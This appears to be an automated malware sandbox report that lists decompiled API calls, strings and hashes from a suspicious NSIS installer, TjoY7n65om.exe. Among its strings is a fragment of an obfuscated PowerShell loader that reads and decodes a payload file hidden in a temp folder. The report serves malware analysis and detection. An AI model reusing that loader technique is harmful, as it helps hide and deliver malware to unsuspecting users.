OleInitialize.OLE32(00000000), ref: 004033F9
SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
CharNextW.USER32(00000000,"C:\Users\user\Desktop\TjoY7n65om.exe",00000020,"C:\Users\user\Desktop\TjoY7n65om.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
ExitProcess.KERNEL32 ref: 004036EE
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TjoY7n65om.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TjoY7n65om.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TjoY7n65om.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TjoY7n65om.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
DeleteFileW.KERNEL32(00420EA8,00420EA8,?,"$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5,00000008,?,00000006,00000008,0000000A), ref: 0040379D
CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
OpenProcessToken.ADVAPI32(00000000), ref: 00403814
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
ExitProcess.KERNEL32 ref: 00403894

Strings

"C:\Users\user\Desktop\TjoY7n65om.exe", xrefs: 00403430, 00403436, 0040362A
TMP, xrefs: 004035E9
C:\Users\user\AppData\Local\Temp\depersonaliseredes, xrefs: 004036AA
"$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5, xrefs: 00403761
\Temp, xrefs: 004035B3
.tmp, xrefs: 00403715
~nsu, xrefs: 004036F9
C:\Users\user\AppData\Local\Temp\, xrefs: 00403591, 00403596, 004035AC, 004035B8, 004035C7, 004035D4, 004035E0, 004035E8, 004036FE, 0040370F, 0040371A, 00403726, 00403733, 00403742, 004037F3
TEMP, xrefs: 004035E1
SeShutdownPrivilege, xrefs: 00403823
NSIS Error, xrefs: 0040341B
UXTHEME, xrefs: 004033A9, 004033AE, 004033B4
C:\Users\user\AppData\Local\Temp\depersonaliseredes, xrefs: 0040357F, 0040369F, 00403749, 00403753
Low, xrefs: 004035CF
C:\Users\user\Desktop, xrefs: 00403720, 00403725, 00403752
1033, xrefs: 004035FD
Error launching installer, xrefs: 00403684

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5$"C:\Users\user\Desktop\TjoY7n65om.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\depersonaliseredes$C:\Users\user\AppData\Local\Temp\depersonaliseredes$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-271050449
Opcode ID: b19ebecd6ca5737548316411bb107f2a7d046da96c0e713e32cea02ef9e1e94b
Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
Opcode Fuzzy Hash: b19ebecd6ca5737548316411bb107f2a7d046da96c0e713e32cea02ef9e1e94b
Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405489
GetDlgItem.USER32(?,000003EE), ref: 00405498
GetClientRect.USER32(?,?), ref: 004054D5
GetSystemMetrics.USER32(00000002), ref: 004054DC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
ShowWindow.USER32(?,00000008), ref: 00405578
GetDlgItem.USER32(?,000003EC), ref: 00405599
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
GetDlgItem.USER32(?,000003F8), ref: 004054A7

Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E

GetDlgItem.USER32(?,000003EC), ref: 004055EB
CreateThread.KERNELBASE(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
CloseHandle.KERNELBASE(00000000), ref: 00405600
ShowWindow.USER32(00000000), ref: 00405624
ShowWindow.USER32(?,00000008), ref: 00405629
ShowWindow.USER32(00000008), ref: 00405673
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
CreatePopupMenu.USER32 ref: 004056B8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
GetWindowRect.USER32(?,?), ref: 004056EC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
OpenClipboard.USER32(00000000), ref: 0040574D
EmptyClipboard.USER32 ref: 00405753
GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
GlobalLock.KERNEL32(00000000), ref: 00405769
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
GlobalUnlock.KERNEL32(00000000), ref: 0040579D
SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
CloseClipboard.USER32 ref: 004057AE

Strings

{, xrefs: 00405691
6B, xrefs: 00405719

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {$6B
API String ID: 590372296-3705917127
Opcode ID: ed459c3b0bc3866f5c1ebcdd147b2ed2301770daeddf159f08537acbff253c4e
Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
Opcode Fuzzy Hash: ed459c3b0bc3866f5c1ebcdd147b2ed2301770daeddf159f08537acbff253c4e
Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45

Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,774D3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,774D3420), ref: 004065D2
FindClose.KERNEL32(00000000), ref: 004065DE

Strings

8gB, xrefs: 004065C8

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8gB
API String ID: 2295610775-1733800166
Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Local\Temp\depersonaliseredes, xrefs: 004021C3

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\depersonaliseredes
API String ID: 542301482-2693056274
Opcode ID: 5cba2042925f0a607390c6eace5ead972fd1e42bd24b6c44ab96890c65fe79be
Instruction ID: 81793f1010fc2e559759275c5502ec42cf4e228633e8d7c3619733a9a8aee0f9
Opcode Fuzzy Hash: 5cba2042925f0a607390c6eace5ead972fd1e42bd24b6c44ab96890c65fe79be
Instruction Fuzzy Hash: 34414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 83698e80e24e563e54c4a8404194c01640705265cde1cffeb308655126ebb9a5
Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
Opcode Fuzzy Hash: 83698e80e24e563e54c4a8404194c01640705265cde1cffeb308655126ebb9a5
Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A

Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
ShowWindow.USER32(?), ref: 00403D7B
DestroyWindow.USER32 ref: 00403D8F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
GetDlgItem.USER32(?,?), ref: 00403DCC
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
IsWindowEnabled.USER32(00000000), ref: 00403DE7
GetDlgItem.USER32(?,00000001), ref: 00403E95
GetDlgItem.USER32(?,00000002), ref: 00403E9F
SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
GetDlgItem.USER32(?,00000003), ref: 00403FB0
ShowWindow.USER32(00000000,?), ref: 00403FD1
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
EnableWindow.USER32(?,?), ref: 00403FFE
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
EnableMenuItem.USER32(00000000), ref: 0040401B
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
SetWindowTextW.USER32(?,004236E8), ref: 00404084
ShowWindow.USER32(?,0000000A), ref: 004041B8

Strings

6B, xrefs: 00404060

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: 6B
API String ID: 3282139019-4127139157
Opcode ID: 61e46f2e5d4e30b8d331e99b2e62090d3ddcc4212222171d7de82e9bf3d87482
Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
Opcode Fuzzy Hash: 61e46f2e5d4e30b8d331e99b2e62090d3ddcc4212222171d7de82e9bf3d87482
Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

Function 00403974 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,774D3420,"C:\Users\user\Desktop\TjoY7n65om.exe",00000000), ref: 004039F5
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\depersonaliseredes,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\depersonaliseredes,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
GetFileAttributesW.KERNEL32(: Completed), ref: 00403A93
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\depersonaliseredes), ref: 00403ADC

Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8

RegisterClassW.USER32(004291A0), ref: 00403B19
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
ShowWindow.USER32(00000005,00000000), ref: 00403B9C
GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
RegisterClassW.USER32(004291A0), ref: 00403BDE
DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD

Strings

"C:\Users\user\Desktop\TjoY7n65om.exe", xrefs: 00403978
RichEd32, xrefs: 00403BB0
.DEFAULT\Control Panel\International, xrefs: 004039E0
Control Panel\Desktop\ResourceLocale, xrefs: 004039A8
_Nb, xrefs: 00403AF8, 00403B60
: Completed, xrefs: 00403A3C, 00403A45, 00403A53, 00403AA2, 00403AA8
.exe, xrefs: 00403A82
RichEd20, xrefs: 00403BA2
6B, xrefs: 004039A0
C:\Users\user\AppData\Local\Temp\, xrefs: 00403980
RichEdit, xrefs: 00403BCF
C:\Users\user\AppData\Local\Temp\depersonaliseredes, xrefs: 00403A04, 00403A0C, 00403AAF, 00403AB5, 00403AC5
RichEdit20W, xrefs: 00403BC0, 00403BC6
1033, xrefs: 00403994, 004039F0

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\TjoY7n65om.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\depersonaliseredes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
API String ID: 1975747703-222409113
Opcode ID: 8587381b39fd61b124eaa29958d8087b8bcb74e0bb8df45c1207c7271d45e6f8
Instruction ID: 9910424c6ca31f4cc559053cc35dfc0eeb30f3212361bd75bc0ff30566f1833d
Opcode Fuzzy Hash: 8587381b39fd61b124eaa29958d8087b8bcb74e0bb8df45c1207c7271d45e6f8
Instruction Fuzzy Hash: C961B870244600BFE630AF269D46F273A6CEB44B49F40057EF985B62E2DB7D5911CA2D

Function 00402EDD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EEE
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A

Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56

Strings

Null, xrefs: 00402FD4
"C:\Users\user\Desktop\TjoY7n65om.exe", xrefs: 00402EDD
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
soft, xrefs: 00402FCB
Inst, xrefs: 00402FC2
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
Error launching installer, xrefs: 00402F2D

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
